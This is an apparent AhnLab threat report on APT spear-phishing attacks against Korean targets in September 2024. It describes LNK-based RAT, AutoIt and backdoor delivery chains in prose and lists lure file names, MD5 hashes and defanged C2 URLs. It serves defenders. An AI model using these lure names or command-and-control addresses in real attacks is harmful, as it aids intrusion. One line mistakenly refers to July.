This report covers classification and statistics on APT domestic attacks confirmed during the month of September 2024 and introduces the functions of each type.  Below is a summary of some of the information.

[Table of Contents]

• Overview
• Trends of APT Attacks in Korea
  • Spear Phishing
    • Attacks Using LNK Files
    • Attacks Using HWP Files
    • Attacks Using MSC Files
    • Attacks Using CHM Files
  • Supply Chain Attack
    • Attacks Using EXE Files
• AhnLab Response Overview
• Conclusion
• IoC (Indicators of Compromise)
  • Key File Names
  • File Hashes (MD5s)
  • Relevant Domains, URLs, and IP Addresses

[Overview]

AhnLab has been using AhnLab Smart Defense (ASD) to monitor advanced persistent threat (APT) attacks against targets in Korea. This report will cover the types and statistics of APT attacks in Korea during September 2024 as well as features of each type.

 

Figure 1. September 2024 statistics on APT attacks in Korea

 

APT attacks against Korean targets have been categorized by penetration type, and most were found to be spear phishing. In September 2024, spear phishing attacks using HWP and MSC file extensions were found in large numbers.

 

[Trends of APT Attacks in Korea]
 

The cases and features of each APT attack type identified in July 2024 are as follows.

 

 Spear Phishing

 

1)   Spear Phishing

 

Spear phishing is a type of phishing attack against specific individuals or groups. Unlike ordinary phishing attacks, the threat actor conducts reconnaissance before launching the attacks to collect information on and learn about the attack targets. Because the threat actor crafts phishing emails using the collected information, the recipients of the emails are highly likely to believe that they are from a trusted source. There are also cases where the sender’s address is manipulated through email spoofing. Most spear phishing attacks include malicious attachments or links that are intended to lure the user to open them.

 

Types distributed using this technique are as follows.

 

1.1  Attacks Using LNK Files

Type A

This type executes RAT malware. They are generally distributed as compressed files alongside legitimate files. The LNK files found in distribution contained malicious PowerShell commands. Besides using DropBox API or Google Drive to download malware, the recently identified LNK files also use the method of creating additional script files and obfuscated RAT in the TEMP or PUBLIC folder upon execution. The RAT malware executed in the end can perform various malicious behaviors, such as keylogging and taking screenshots, according to commands from the threat actor. XenoRAT and RoKRAT were some of the RAT types found in this case.

 

The confirmed file name is as follows.

 

File  Name

le.docx.lnk

Table 1. Confirmed file name

 
Type B

 

This type downloads AutoIt malware. When the malicious PowerShell command included in the LNK file is executed, it connects to an external URL to download additional files. A notable feature in this process is that it copies the curl.exe program to another file name (such as VezoQxO.exe) and then executes it. Ultimately, a legitimate AutoIt program and a malicious AutoIt script are downloaded, and the downloaded files are registered to the Task Scheduler to ensure they can be executed continuously.

The confirmed file name is as follows.

 

 

File  Name

2024 Energy Technology Development Project Final Evaluation Committee Member Appointment Guide.pdf.lnk

Unreported Statement for Source of Funds (Enforcement Ordinance of the Value-Added Tax Act).hwp.lnk

Table 2. Confirmed file name

 

Type C

This type involves creating numerous obfuscated scripts in the ProgramData folder to download a backdoor. The generated script files operate organically and are characterized by having .tmp or .dat extensions. When the script file is executed, it connects to a C2 server to download and execute additional PowerShell scripts. Ultimately, RDP Wrapper is installed on the user’s PC to download and execute backdoors such as PebbleDash.

The confirmed file names are as follows.

 

File  Name

Upbit_20240916 docx lnk.lnk

Subsidy Application Related Inquiry.docx lnk.lnk

Table 3. Confirmed file name

 

 

MD5

0709eb988570c2e70a58375681d91e30

08111135bae27c8aafd08457e95b7380

084f2274a4436608905995b7fd9436d9

0c3fd7f45688d5ddb9f0107877ce2fbd

0e7e3a078bb6be89afa6876bb431d903

URL

http[:]//101[.]36[.]114[.]91/asanpolicy[.]lol/MyVirus/d[.]php?na=comline

http[:]//185[.]158[.]113[.]101[:]54333/

http[:]//206[.]206[.]127[.]152[:]7032/

http[:]//216[.]107[.]137[.]73[:]6516/

http[:]//64[.]49[.]14[.]181[:]7031/